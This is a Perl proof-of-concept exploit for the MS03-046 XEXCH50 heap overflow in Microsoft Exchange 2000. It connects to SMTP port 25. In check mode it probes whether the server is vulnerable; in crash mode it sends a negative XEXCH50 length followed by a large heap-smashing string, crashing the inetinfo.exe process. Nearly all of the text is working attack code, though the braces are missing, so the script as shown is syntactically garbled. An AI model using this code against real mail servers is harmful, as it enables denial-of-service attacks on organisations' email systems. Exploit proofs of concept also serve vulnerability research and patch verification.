Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)

#!/usr/bin/perl -w

                              # - hdm metasploit com
                              # This vulnerability allows a remote unauthenticated user to overwrite big chunks 
                              # of the heap used by the inetinfo.exe process. Reliably exploiting this bug is 
                              # non-trivial; even though the entire buffer is binary safe (even nulls) and can be 
                              # just about any size, the actual code that crashes varies widely with each request. 
                              # During the analysis process, numerous combinations of request size, concurrent 
                              # requests, pre-allocations, and alternate trigger routes were examined and not a 
                              # single duplicate of location and data offset was discovered. Hopefully the magic 
                              # combination of data, size, and setup will be found to allow this bug to be reliably 
                              # exploited.

                              # minor bugfix: look for 354 Send binary data

                              use strict;
                              use IO::Socket;

                              my $host = shift() || usage();
                              my $mode = shift() || "CHECK";
                              my $port = 25;

                              if (uc($mode) eq "CHECK") { check() }
                              if (uc($mode) eq "CRASH") { crash() }


                              sub check
                              my $s = SMTP($host, $port);
                              if (! $s)
                              print "[*] Error establishing connection to SMTP service.\n";

                              print $s "XEXCH50 2 2\r\n";
                              my $res = <$s>;    
                              close ($s);

                              # a patched server only allows XEXCH50 after NTLM authentication
                              if ($res !~ /354 Send binary/i)
                              print "[*] This server has been patched or is not vulnerable.\n";

                              print "[*] This system is vulnerable: $host:$port\n";


                              sub crash
                              my $s = SMTP($host, $port);
                              if (! $s)
                              print "[*] Error establishing connection to SMTP service.\n";

                              # the negative value allows us to overwrite random heap bits
                              print $s "XEXCH50 -1 2\r\n";
                              my $res = <$s>;    

                              # a patched server only allows XEXCH50 after NTLM authentication
                              if ($res !~ /354 Send binary/i)
                              print "[*] This server has been patched or is not vulnerable.\n";

                              print "[*] Sending massive heap-smashing string...\n";
                              print $s ("META" x 16384);

                              # sometimes a second connection is required to trigger the crash
                              $s = SMTP($host, $port);


                              sub usage 
                              print STDERR "Usage: $0  [CHECK|CRASH]\n";


                              sub SMTP
                              my ($host, $port) = @_;
                              my $s = IO::Socket::INET->new
                              PeerAddr => $host,
                              PeerPort => $port,
                              Proto    => "tcp"
                              ) || return(undef);

                              my $r = <$s>;
                              return undef if !$r;

                              if ($r !~ /Microsoft/)
                              print STDERR "[*] This does not look like an exchange server: $r\n";

                              print $s "HELO X\r\n";
                              $r = <$s>;
                              return undef if !$r;   

                              print $s "MAIL FROM: DoS\r\n";
                              $r = <$s>;
                              return undef if !$r;

                              print $s "RCPT TO: Administrator\r\n";
                              $r = <$s>;
                              return undef if !$r;


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